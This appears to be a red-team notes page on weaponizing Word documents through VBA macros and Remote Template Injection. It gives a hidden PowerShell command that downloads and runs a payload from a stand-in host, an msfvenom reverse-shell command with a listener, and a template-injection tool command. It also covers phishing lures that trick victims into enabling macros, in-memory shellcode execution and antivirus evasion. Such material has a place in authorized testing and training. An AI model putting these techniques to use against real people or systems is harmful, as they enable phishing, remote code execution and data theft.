VBA Macros & RTI
Visual Basic for Applications (VBA) Macros
Macro-based document attacks offer ease of creation and customization, along with flexibility for evading detection. However, they face obstacles such as being easily blocked, disabled macros in modern Office versions, and heuristic detection, necessitating user interaction for execution.
- Hard drive execution
You can create a macro in a Word document by going to View > Macros > Create. Change the "Macros in" field from "All active templates and documents" to "Document 1". Give the macro a name and click Create. To force the macro to trigger automatically when the document is opened, use the name AutoOpen.
! There are some differences between the various Office applications utilization of VBA. For example, Document_Open() is called Workbook_Open() in Excel.
"wscript" is the Windows Script Host, which is designed for automation. The "shell" method provides the ability to execute OS commands. To test the above code, use the play/pause/stop buttons.
Next, we need to replace notepad with a Beacon payload. To generate one, for example a powershell payload pointing to a listener and hosted in "http://example.com/a" with Cobalt Strike go to Cobalt Strike/Attacks/Scripted Web Delivery (S).
Example (Add another set of double quotation marks around the IEX command)
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://example.com/a'))"""
To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information. This is to prevent the username on your system being embedded in the document.
Next, go to File > Save As and save it to C:\Payloads. Give it any filename, but in the Save as type dropdown, change the format from .docx to Word 97-2003 (.doc) (can't save macros inside a .docx).
Then we need to host the file in order to make the user download it from the web (we could use a service such as OneDrive as this would provide you a more legitimate domain name to use). We do this, because the user must first click Enabled Editing and then on Enable Content to execute the macro. If you attach the document directly to the email, it will not have MOTW and therefore not open in Protected View.
Example of a VBA macro that downloads a meterpreter executable, cobalt beacon or whatever and add a small time delay to allow the file to completely download, then executes the malware hidden:
- HTML Email Templates for Word downloading
Even though the WYSIWYG text editor in OWA supports HTML, it's not very good for composing rich HTML-based emails.
HTML Templates: https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html
For example, to custom a word one, change the text placeholders and URL to the payload on lines 160 (https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L160), 183 (https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L183), 192 (https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L192), 197 (https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L197), and 207 (https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L207)
- "Encrypted" Text
To make it look legitimate and make the victim click on "Enable Macros", we can create an encrypted text that will be unencrypted when clicking on it. To do this, we select the text we want to hide, then navigate to Insert > Quick Parts > AutoTexts and Save Selection to AutoText Gallery. In the Create New Building Block dialog box, we’ll enter the name “TheDoc”. With the content stored, we can delete it from the main text area of the document. Next, we’ll copy the fake RSA encrypted text from the original Word document and insert it into the main text area of this document. Now we’ll need to edit the VBA macro, inserting commands that will delete the fake RSA encrypted text and replace it with the text we want.
- Remote Template Injection (RTI)
Microsoft Word has the option of creating new documents from a template. Office has some templates pre-installed, you can make custom templates, and even download new ones. Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.
Open Word, create a new blank document and insert your desired macro. Save this as a Word 97-2003 Template (*.dot) file. This is now our "malicious remote template". We can then use Cobalt Strike to host this file at http://example.com/template.dot.
Next, create a new document from the blank template, add any content you want, then save it as a new .docx.
Then, browse to the directory in explorer, right-click and select 7-Zip > Open archive. Navigate to word > _rels, right-click on settings.xml.rels and select Edit.
Then modify the Target entry.
Save those changes and email the document.
We can automate this with remoteInjector.py (https://github.com/JohnWoodman/remoteinjector):
python3 remoteinjector.py -w http://example.com/template.dot document.docx
- In-memory execution
We can call arbitrary Win32 APIs directly from VBA, which is required if we want to execute shellcode from memory.
The typical approach is to use three Win32 APIs from Kernel32.dll: VirtualAlloc, RtlMoveMemory, and CreateThread.
We will use VirtualAlloc to allocate unmanaged memory that is writable, readable, and executable. We’ll then copy the shellcode into the newly allocated memory with RtlMoveMemory, and create a new execution thread in the process through CreateThread to execute the shellcode. (Allocating memory through other Win32 APIs returns non-executable memory due to the memory protection called Data Execution Prevention (DEP)).
To do this, in summary, we begin by declaring functions for the three Win32 APIs. Then we declare five variables, including a variable for our Meterpreter array and use VirtualAlloc to create some space for our shellcode. Next, we use RtlMoveMemory to put our code in memory with the help of a For loop. Finally, we use CreateThread to execute our shellcode.
In order to generate the shellcode, we need to know the target architecture. Most likely we are targeting a 64-bit Windows machine, but Microsoft Word 2016 installs as 32-bit by default, so we will generate 32-bit shellcode.
We can import the shellcode directly in the macro (msfvenom vbapplication) or we can import a powershell script containing the shellcode (We can generate it with msfvenom).
Example of VBA macro with XOR encrypted shellcode inside and sleep timers (https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Simple%20Shellcode%20Runner/Simple%20Shellcode%20Runner.vba):
Example of VBA Macro that loads a powershell script hosted elsewhere and executes it in memory:
We can improve this to make it run as a child process of WmiPrvSE.exe and not Microsoft Word, which is more suspicious:
We can go further and encrypt it, first we create an encryption routine with powershell (https://github.com/Octoberfest7/OSEP-Tools/blob/main/vbobfuscate.ps1):
Then we copy the output in the following VBA Macro (https://github.com/Octoberfest7/OSEP-Tools/blob/main/Word_pscradle):
Also we can ecnrypt the name of the payload and add the to bypass heuristics in VBA, so when the antivirus changes the name of the document to scan it, it stops, we will receive the shell if the name of the document is the same:
Spoofing Office Macro: https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
- BadAss Macro Tool
https://github.com/Inf0secRabbit/BadAssMacros/releases/tag/v1.0
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f raw -o shellcode.raw
.\BadAssMacrosx86.exe -i shellcode.raw -s indirect -p no -w doc -o output-vba.txt
nc -nlvp 443
- WMI Staging
Leveraging WMI for process spawning disrupts the attack chain, enhancing evasion. Conditional execution, including domain checks and delayed actions, adds layers of sophistication. Employing VBA as an initial stage to download additional payloads strengthens the attack's scalability and adaptability.
Last updated